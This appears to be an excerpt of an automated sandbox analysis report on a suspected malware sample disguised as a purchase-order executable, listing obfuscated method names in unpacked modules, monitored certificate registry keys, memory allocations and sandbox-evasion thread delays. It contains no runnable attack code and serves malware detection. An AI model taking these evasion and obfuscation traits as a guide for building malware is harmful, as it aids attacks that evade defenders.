            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, HOW2huMWuH24JAKIss.csHigh entropy of concatenated method names: 'r9ZF1a7g7W', 'auXF5286Mj', 'X5VFqxmeSt', 'SqXFd0Utof', 'W6EFTl8nev', 'AAsF9Rjvep', 'kdlFKIlVtm', 'IYVFHdWnfY', 'nerFjUsNGW', 'BrOFncMRT0'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, jcEPgTbuGk9a0DVG02.csHigh entropy of concatenated method names: 'BOcXYiC9yG', 'uplXuEX9D2', 'aJWXfO63j1', 'AhDXhJXqol', 'BLUXtftJUc', 'lMtXMQ8Jso', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, evek6BLcvke2fGAw2F.csHigh entropy of concatenated method names: 'yMt4Jwqx4h', 'cpk4sUmUEa', 'Trp4YSIyAn', 'cZM4ue7rC8', 'QX94hMs9Yl', 'i6n4MG19Rj', 'VGt4P3qRwa', 'lwH4Bv6WUa', 'rJM4r4yfOG', 'eyH4pM2jV1'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, Gut9Ewn4ddg6joA4vi.csHigh entropy of concatenated method names: 'kkmK5e6m72', 'dI8Kd8m14s', 'TcQK9MLiSA', 'TXY9i7lASE', 'HGv9zh7XrD', 'amrKoxVnup', 'lnhKmvyLUM', 'F7SKat9JAJ', 'VRxKF4H5EI', 'O7xKCGMM9d'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, CQO8IbYU17tGjjxd23.csHigh entropy of concatenated method names: 'JopLm5AhXV', 'PAMLFLRSbE', 'T9RLCL821S', 'EUKL5HIMLr', 'eN6LqPltD0', 'DisLT70MDM', 'nPKL9lbg1o', 'iw3XNRhUIf', 'wwmX65lrFK', 'Dr0XZHFkEB'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, fnI6us3IgPBqmng04s.csHigh entropy of concatenated method names: 'mK09gfnDei', 'biA9yX4v0H', 'uh19kHoYg7', 'kMk9GEAqrY', 'uhe9Sti858', 'LCD98W5IdP', 'GXW9sLsi61', 'hiZ9wb6vI8', 'gp4F0p3i6hXbjGK7WNl', 'cZjWoi3OUHwoLByrQ7n'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, c7G1s7QBOOZM36BDQn.csHigh entropy of concatenated method names: 'A5cqtjFuvs', 'MeyqeyLVYw', 'A5dqbaTUbc', 'yAmqISDhZv', 'sL5qAA5hpK', 'wmiqOr0EVP', 'masqN1wmdU', 'cLnq6fgI7n', 'WoqqZyVamO', 'aVlqisR6BB'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, IbXF8jBrWJjZpHVyg7N.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'luJQtAbrIF', 'QpeQeagT3s', 'xraQbMnGQJ', 'fyGQIY3fkO', 'TguQAEoJQt', 'nbTQOvie8Y', 'y5jQN5dpn5'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, kBnWKD6s4FcdQnOKPq.csHigh entropy of concatenated method names: 'suAmKFr5ZH', 'tZQmHP2d0A', 'WLKmntGeg4', 'VVQmWM6Y2B', 'aZdmD9DQsv', 'TnHm2iou8o', 'KrOagMktLA5erNHZ9j', 'fWNCjY7rR60BgoIA8q', 'gDNmmZZx5K', 'LABmFTEiSo'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, Bs4Lti9JmpwTlEvneK.csHigh entropy of concatenated method names: 'fivdGKYb4s', 'bqZdS3IofQ', 'vKYdJhZi3f', 'n9odsJ5eRi', 'P6tdDSZkQw', 'L4nd2tlMfr', 'MiFdEp1PHZ', 'YXNdXAsOCD', 'YLndLb8WNs', 'FQTdQXGZUq'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, x42rRpoStLLHSoccQX.csHigh entropy of concatenated method names: 'H9WEnyNGhw', 'ih5EWcmA17', 'ToString', 'K9SE5K8CrZ', 'qKBEqJQTYJ', 'h6OEdHup9J', 'psSETFf6Rd', 'AnME9Dm1aM', 'HK5EK51tGp', 'PRuEHNZgJC'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, yxdkC1VeQpQ4MXEEFJ.csHigh entropy of concatenated method names: 'cpfk801If', 'EbdGj9HZ7', 'bN8S09euc', 'rYD8rWKbf', 'fJUsWjt8P', 'FPIw4SsxS', 'JD2rlOKPcQh2kfrgUh', 'Yr8gPZRIE5Pjgr8vwV', 'V7QX5qIsV', 'dNlQqOJ1N'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, OrOWP3BG8kwAgXb9pIp.csHigh entropy of concatenated method names: 'cYrLyVQSnC', 'HK3L0FsUVr', 'PS4Lkm9RLw', 'U03LG8glBu', 'dHELldMv3D', 'VVDLSDbhsj', 'a0wL8VliG3', 'fLCLJN8WUx', 'yOCLsy76YZ', 'q2WLwksSsD'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, fe8puFlDcqURUIC0vF.csHigh entropy of concatenated method names: 'pAsKyxXMQo', 'X3cK0JHe4r', 'HgQKkT08lX', 'H9WKGGtu5H', 'NUjKldvobk', 'WfvKSIfCM8', 'zSZK8aTF9f', 'froKJotanD', 'K9tKsYiNYD', 'WoyKwgllUo'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, shsLPlzoLrkYCdBPmM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pt6L4W7iMw', 'glfLD7GMnL', 'ViuL2P6NZE', 'IkULEUso3e', 'S2RLX4CWRO', 'TnlLLi7m1L', 'V95LQ7asO1'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, gqS9nWwXBEY5Fr49ds.csHigh entropy of concatenated method names: 'YrY91Ko4QJ', 'z8r9qXnuHL', 'uxc9TVCLBZ', 'Erc9KOAG2O', 'XKr9HjwQlw', 'KG8TA5Hyi4', 'q2ETOEO6c2', 'bKATNJSkmk', 'MRgT6jYBb7', 'VGQTZCsnAE'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, sGYLIBRP2UYPvkC8iu.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WHraZ9EUJY', 'n64aiZob5Z', 'D9Aaz4cvov', 'UTjFoPytLF', 'RjBFmtCN41', 'zfbFap0Q4e', 'zxgFFDOt0W', 'EfQfxsJcb6OWPNPihSq'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, Y1x70KpXwX06bg0SJN.csHigh entropy of concatenated method names: 'ToString', 'uvD2pBdY6O', 'lrX2u3PfO4', 'TJP2fdWpyj', 'yv82hCfc9h', 'nJq2M0QZK6', 'pe523OwpAy', 'dY22P8YM4d', 'Ghm2BvZIBo', 'so72RoxdHy'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, S2gI0tJTis4pOlOImq.csHigh entropy of concatenated method names: 'Dispose', 'GHnmZdayLT', 'MJBauUv4OB', 'i9D77uqY2K', 'M4smi9nM1t', 'YftmzwlvxG', 'ProcessDialogKey', 'zNEaobqWC0', 'xndamBaBPa', 'NHdaaTudBH'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, ofMc7kSjLqFQ721OW8.csHigh entropy of concatenated method names: 'kq1X59TDiD', 'qT9XqZBD2t', 'uYsXdqUql7', 'deJXTDhgBP', 'WCtX96obJj', 'R3JXK0LZG1', 'wMhXHf1hBx', 'gaRXj23cY9', 'xUZXnIvGxw', 'rHJXW594AT'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, HOW2huMWuH24JAKIss.csHigh entropy of concatenated method names: 'r9ZF1a7g7W', 'auXF5286Mj', 'X5VFqxmeSt', 'SqXFd0Utof', 'W6EFTl8nev', 'AAsF9Rjvep', 'kdlFKIlVtm', 'IYVFHdWnfY', 'nerFjUsNGW', 'BrOFncMRT0'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, jcEPgTbuGk9a0DVG02.csHigh entropy of concatenated method names: 'BOcXYiC9yG', 'uplXuEX9D2', 'aJWXfO63j1', 'AhDXhJXqol', 'BLUXtftJUc', 'lMtXMQ8Jso', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, evek6BLcvke2fGAw2F.csHigh entropy of concatenated method names: 'yMt4Jwqx4h', 'cpk4sUmUEa', 'Trp4YSIyAn', 'cZM4ue7rC8', 'QX94hMs9Yl', 'i6n4MG19Rj', 'VGt4P3qRwa', 'lwH4Bv6WUa', 'rJM4r4yfOG', 'eyH4pM2jV1'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, Gut9Ewn4ddg6joA4vi.csHigh entropy of concatenated method names: 'kkmK5e6m72', 'dI8Kd8m14s', 'TcQK9MLiSA', 'TXY9i7lASE', 'HGv9zh7XrD', 'amrKoxVnup', 'lnhKmvyLUM', 'F7SKat9JAJ', 'VRxKF4H5EI', 'O7xKCGMM9d'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, CQO8IbYU17tGjjxd23.csHigh entropy of concatenated method names: 'JopLm5AhXV', 'PAMLFLRSbE', 'T9RLCL821S', 'EUKL5HIMLr', 'eN6LqPltD0', 'DisLT70MDM', 'nPKL9lbg1o', 'iw3XNRhUIf', 'wwmX65lrFK', 'Dr0XZHFkEB'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, fnI6us3IgPBqmng04s.csHigh entropy of concatenated method names: 'mK09gfnDei', 'biA9yX4v0H', 'uh19kHoYg7', 'kMk9GEAqrY', 'uhe9Sti858', 'LCD98W5IdP', 'GXW9sLsi61', 'hiZ9wb6vI8', 'gp4F0p3i6hXbjGK7WNl', 'cZjWoi3OUHwoLByrQ7n'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, c7G1s7QBOOZM36BDQn.csHigh entropy of concatenated method names: 'A5cqtjFuvs', 'MeyqeyLVYw', 'A5dqbaTUbc', 'yAmqISDhZv', 'sL5qAA5hpK', 'wmiqOr0EVP', 'masqN1wmdU', 'cLnq6fgI7n', 'WoqqZyVamO', 'aVlqisR6BB'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, IbXF8jBrWJjZpHVyg7N.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'luJQtAbrIF', 'QpeQeagT3s', 'xraQbMnGQJ', 'fyGQIY3fkO', 'TguQAEoJQt', 'nbTQOvie8Y', 'y5jQN5dpn5'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, kBnWKD6s4FcdQnOKPq.csHigh entropy of concatenated method names: 'suAmKFr5ZH', 'tZQmHP2d0A', 'WLKmntGeg4', 'VVQmWM6Y2B', 'aZdmD9DQsv', 'TnHm2iou8o', 'KrOagMktLA5erNHZ9j', 'fWNCjY7rR60BgoIA8q', 'gDNmmZZx5K', 'LABmFTEiSo'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, Bs4Lti9JmpwTlEvneK.csHigh entropy of concatenated method names: 'fivdGKYb4s', 'bqZdS3IofQ', 'vKYdJhZi3f', 'n9odsJ5eRi', 'P6tdDSZkQw', 'L4nd2tlMfr', 'MiFdEp1PHZ', 'YXNdXAsOCD', 'YLndLb8WNs', 'FQTdQXGZUq'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, x42rRpoStLLHSoccQX.csHigh entropy of concatenated method names: 'H9WEnyNGhw', 'ih5EWcmA17', 'ToString', 'K9SE5K8CrZ', 'qKBEqJQTYJ', 'h6OEdHup9J', 'psSETFf6Rd', 'AnME9Dm1aM', 'HK5EK51tGp', 'PRuEHNZgJC'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, yxdkC1VeQpQ4MXEEFJ.csHigh entropy of concatenated method names: 'cpfk801If', 'EbdGj9HZ7', 'bN8S09euc', 'rYD8rWKbf', 'fJUsWjt8P', 'FPIw4SsxS', 'JD2rlOKPcQh2kfrgUh', 'Yr8gPZRIE5Pjgr8vwV', 'V7QX5qIsV', 'dNlQqOJ1N'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, OrOWP3BG8kwAgXb9pIp.csHigh entropy of concatenated method names: 'cYrLyVQSnC', 'HK3L0FsUVr', 'PS4Lkm9RLw', 'U03LG8glBu', 'dHELldMv3D', 'VVDLSDbhsj', 'a0wL8VliG3', 'fLCLJN8WUx', 'yOCLsy76YZ', 'q2WLwksSsD'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, fe8puFlDcqURUIC0vF.csHigh entropy of concatenated method names: 'pAsKyxXMQo', 'X3cK0JHe4r', 'HgQKkT08lX', 'H9WKGGtu5H', 'NUjKldvobk', 'WfvKSIfCM8', 'zSZK8aTF9f', 'froKJotanD', 'K9tKsYiNYD', 'WoyKwgllUo'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, shsLPlzoLrkYCdBPmM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pt6L4W7iMw', 'glfLD7GMnL', 'ViuL2P6NZE', 'IkULEUso3e', 'S2RLX4CWRO', 'TnlLLi7m1L', 'V95LQ7asO1'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, gqS9nWwXBEY5Fr49ds.csHigh entropy of concatenated method names: 'YrY91Ko4QJ', 'z8r9qXnuHL', 'uxc9TVCLBZ', 'Erc9KOAG2O', 'XKr9HjwQlw', 'KG8TA5Hyi4', 'q2ETOEO6c2', 'bKATNJSkmk', 'MRgT6jYBb7', 'VGQTZCsnAE'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, sGYLIBRP2UYPvkC8iu.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WHraZ9EUJY', 'n64aiZob5Z', 'D9Aaz4cvov', 'UTjFoPytLF', 'RjBFmtCN41', 'zfbFap0Q4e', 'zxgFFDOt0W', 'EfQfxsJcb6OWPNPihSq'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, Y1x70KpXwX06bg0SJN.csHigh entropy of concatenated method names: 'ToString', 'uvD2pBdY6O', 'lrX2u3PfO4', 'TJP2fdWpyj', 'yv82hCfc9h', 'nJq2M0QZK6', 'pe523OwpAy', 'dY22P8YM4d', 'Ghm2BvZIBo', 'so72RoxdHy'
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, S2gI0tJTis4pOlOImq.csHigh entropy of concatenated method names: 'Dispose', 'GHnmZdayLT', 'MJBauUv4OB', 'i9D77uqY2K', 'M4smi9nM1t', 'YftmzwlvxG', 'ProcessDialogKey', 'zNEaobqWC0', 'xndamBaBPa', 'NHdaaTudBH'
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: 81E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: 77B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: 91E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: A1E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: 5080000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599217Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598094Jump to behavior
